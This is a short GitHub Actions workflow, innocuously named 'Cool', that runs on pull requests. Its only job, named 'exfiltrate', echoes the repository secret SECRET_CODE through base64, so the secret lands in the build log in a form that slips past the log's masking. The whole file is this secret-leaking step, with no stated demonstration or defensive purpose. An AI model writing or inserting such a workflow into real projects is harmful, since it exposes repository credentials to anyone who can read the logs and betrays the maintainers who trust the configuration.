name: Cool

on:
  pull_request:

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - run: echo ${{ secrets.SECRET_CODE }} | base64
        env:
          SECRET_CODE: ${{ secrets.SECRET_CODE }}